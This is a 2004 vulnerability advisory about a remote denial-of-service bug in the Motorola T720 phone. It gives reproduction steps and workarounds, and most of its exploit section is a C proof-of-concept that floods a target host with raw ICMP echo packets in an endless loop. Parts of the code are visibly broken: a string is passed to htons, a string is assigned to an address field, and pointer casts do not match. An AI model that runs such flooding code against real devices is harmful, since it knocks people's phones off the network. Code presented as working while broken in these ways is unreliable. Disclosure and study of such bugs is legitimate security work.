motorolaT720.txt

`~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*  
  
Product: Motorola T720 Cell phones  
http://www.motorola.com  
Versions: T270  
Bug: DoS vulnerability  
Impact: Attacker's can reboot the cellphone   
remotely.  
Date: March 01, 2004  
Author: Shaun Colley  
Email: [email protected]  
WWW: http://www.nettwerked.co.uk  
  
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*  
  
  
  
Introduction  
#############  
  
"The Motorola T720 proves that the best technological  
innovations carefully balance excitement and fun with  
convenience and simplicity of use. Improve your  
productivity and be one step ahead of the crowd with  
digital customization and applications, or just kick  
back and have a good time with creative entertainment  
and messaging features. Either way, this phone is sure  
to deliver a rich, compelling and truly unforgettable  
wireless experience." - Vendor's website  
(http://www.motorola.com).  
  
The Motorola T720 cell phone is a very nice cell  
phone, with plenty of fun features, including WAP  
access to the Internet. Unfortunately, there is a  
low-risk vulnerability which allows an attacker to  
remotely reboot the cell phone easily.  
  
  
  
The bug  
########  
  
The vulnerability lies within the TCP/IP stack of the  
Motorola T720 cell phone. When the phone receives an  
abnormal amount of IP traffic, the phone powers-off  
when the user attempts to access the network (e.g  
through the WAP browser).   
  
The vulnerability can be reproduced in the following  
way:  
  
-  
1) Connect the phone to the Internet.  
2) Flood the device with IP traffic (i.e SYN packets  
or ICMP_ECHO requests (ping packets)).  
3) Run the WAP browser.  
-  
  
At this point, the phone should power-off, and lose  
network connectivity.  
  
--  
NOTE:  
  
This vulnerability is likely due to a bug in the  
phone's IP implementation which bails when a certain  
backlog of IP packets is exceeded.  
--  
  
  
The exploit  
############  
  
A simple proof-of-concept is demonstrated below:  
  
  
# motorolakill.c  
#include <stdio.h>  
#include <stdlib.h>  
#include <netinet/in.h>  
#include <netdb.h>  
#include <netinet/ip.h>  
#include <netinet/ip_icmp.h>  
  
int main(int argc, char *argv[]) {  
if(argc < 2) {  
printf("Usage: %s <host>\n", argv[0]);  
exit(0);  
}  
  
int sock;  
char packet[5000];  
int on = 1;  
struct sockaddr_in dest;  
struct hostent *host;  
struct iphdr *ip = (struct iphdr *) packet;  
struct icmphdr *icmp = (struct icmp *) packet  
+ sizeof(struct iphdr);  
if((host = gethostbyname(argv[1])) == NULL) {  
printf("Couldn't resolve host!\n");  
exit(-1);  
}  
  
if((sock = socket(AF_INET, SOCK_RAW,  
IPPROTO_ICMP)) == -1) {  
printf("Couldn't make socket!\n");  
printf("You must be root to create a  
raw socket.\n");  
exit(-1);  
}  
  
if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL,  
(char *)&on, sizeof(on))) < 0) {  
perror("setsockopt");  
exit(1);  
}  
  
dest.sin_family = AF_INET;  
dest.sin_addr = *((struct in_addr  
*)host->h_addr);  
ip->ihl = 5;  
ip->id = htons(1337);  
ip->ttl = 255;  
ip->tos = 0;  
ip->protocol = IPPROTO_ICMP;  
ip->version = 4;  
ip->frag_off = 0;  
ip->saddr = htons("1.3.3.7");  
ip->daddr = inet_ntoa(dest.sin_addr);  
ip->tot_len = sizeof(struct iphdr) +  
sizeof(struct icmphdr);  
ip->check = 0;  
icmp->checksum = 0;  
icmp->type = ICMP_ECHO;  
icmp->code = 0;  
printf("Ping flooding %s!\n", argv[1]);  
  
/* begin flooding here. */  
while(1) {  
sendto(sock, packet, ip->tot_len, 0,  
(struct sockaddr *)&dest, sizeof(struct sockaddr));  
}  
return(0);  
}  
# EOF motorolakill.c  
  
  
Use the steps listed above to reproduce the  
vulnerability. The above programs shouldn't need long  
to cause the phone to poweroff.  
  
(please note the phone will only poweroff if the user  
attempts to access the network. If the phone is  
sitting idle, it won't be affected. The user must  
open the WAP browser during the attack, for example.   
This will cause the phone to poweroff quickly.)  
  
  
  
The fix  
########  
  
No solution exists. Possible workarounds are:  
  
- Connect the phone through a router (possibly via GSM  
to allow roaming), filtering out all malicious traffic  
to the device.  
  
- Use another system as a gateway system, firewalling  
the cellphone, and filtering traffic to the device.  
  
  
  
Vendor Status  
##############  
  
I have contacted the vendor regarding this low-risk  
vulnerability. I shall update this if I get a  
response, depending on whether Motorola verify issue  
to be serious enough, or even an issue at all.  
  
  
  
  
  
Thank you for your time.  
Shaun.  
  
  
  
  
  
  
___________________________________________________________  
Yahoo! Messenger - Communicate instantly..."Ping"   
your friends today! Download Messenger Now   
http://uk.messenger.yahoo.com/download/index.html  
`